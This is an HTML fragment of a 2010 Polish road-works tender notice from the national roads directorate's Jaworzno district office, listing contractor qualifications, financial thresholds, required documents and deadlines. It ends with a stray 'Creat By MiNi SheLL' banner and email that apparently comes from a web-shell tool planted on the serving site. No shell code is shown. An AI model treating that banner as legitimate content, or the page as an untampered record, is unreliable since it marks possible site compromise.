<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednimi do funkcji, jakie zostaną im powierzone lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia tych osób. Wykonawca przedstawi wraz z ofertą osobę, na funkcję wymienioną poniżej, która spełnia następujące wymagania: 
                                                                                                                                                                                             
                      1. osoba proponowana do pełnienia funkcji:  Kierownik Budowy                                                                      a) minimalna liczba osób: 1
                        b) minimalne doświadczenie i kwalifikacje: wykonawca musi wykazać, że osoba proponowana na tą funkcję jako kierownik budowy posiada doświadczenie jako kierownik dla robót na drogach krajowych przez okres 3 lat. Wykonawca musi wykazać, że osoba proponowana na to stanowisko jako kierownik budowy zrealizował ( rozpoczął i zakończył) w okresie ostatnich 5 lat, min. po jednym zadaniu zrealizowanym na drogach min. klasy G dla każdej grupy robót objętej zamówieniem.

                      2. osoba proponowana do pełnienia funkcji: Kierownik Robót 
		a) minimalna liczba osób: 1
                        b) minimalne doświadczenie i kwalifikacje: wykonawca musi wykazać, że osoba proponowana na tą funkcję jako kierownik budowy posiada doświadczenie jako kierownik dla robót na drogach krajowych przez okres 2 lat. Wykonawca musi wykazać, że osoba proponowana na to stanowisko zrealizowała (rozpoczęła i zakończyła ) w okresie ostatnich 2 lat , min. po jednym zadaniu zrealizowanym na drogach min. klasy G dla każdej grupy robót objętej zamówieniem
Osoby wskazane na stanowisku Kierownika budowy i kierownika robót drogowych winny posiadać uprawnienia budowlane bez ograniczeń do kierowania robotami w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać:
1) przychód za ostatnie trzy lata obrotowe , tzn. za lata 2007, 2008 i 2009 (na podstawie Rachunku zysków i strat pozycja Przychód netto ze sprzedaży produktów, towarów i materiałów lub Przychód netto ze sprzedaży i zrównane z nimi) w wysokości nie mniejszej niż 9 mln PLN
2) posiadanie środków finansowych  i/lub zdolności kredytowej w wysokości nie mniejszej niż 1,5 mln PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1  Oferta.
2 Tabelę wartości elementów scalonych.
3.	Kosztorys ofertowy.
4.	Wraz z ofertą powinny być złożone:
4.1.	Oświadczenia i dokumenty, wymagane postanowieniami pkt 8 IDW;
4.2.	Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie poświadczonej kopii. 
4.3.	Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą. 
4.4.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu:
1)	pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia, zawierające zakres czynności które te podmioty zobowiązują się wykonać - w przypadku gdy Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów;
2)	pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób na okres ich udziału w wykonywaniu zamówienia, zawierające także listę osób, które zostaną przez ten podmiot udostępnione - w przypadku gdy Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na osobach zdolnych do wykonania zamówienia, innych podmiotów;
3)	pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, zawierające także wysokość środków finansowych które mogą zostać przez ten podmiot udostępnione - w przypadku gdy Wykonawca wykazując spełnianie warunków polega na zdolnościach finansowych innych podmiotów;
4)	pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych jednostek sprzętowych na okres korzystania z nich przy wykonaniu zamówienia, zawierające także listę tych jednostek, które zostaną przez ten podmiot udostępnione - w przypadku gdy Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na jednostkach sprzętowych innych podmiotów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku:
W przypadku zmiany przez władzę ustawodawczą określonej w ust. 1 procentowej stawki podatku VAT, kwota brutto wynagrodzenia zostanie aneksem do niniejszej umowy odpowiednio dostosowana,
-zmiana terminu umowy i wynagrodzenia,
- zmiany dotyczące zapisów w OST i SST.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gddkia.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad
Oddział w Katowicach - Rejon Wysoki Brzeg
43-600 Jaworzno , ul. Mysłowicka 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2010 godzina 08:00, miejsce: Generalna Dyrekcja Dróg Krajowych i Autostrad
Oddział w Katowicach - Rejon Wysoki Brzeg
43-600 Jaworzno , ul. Mysłowicka 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com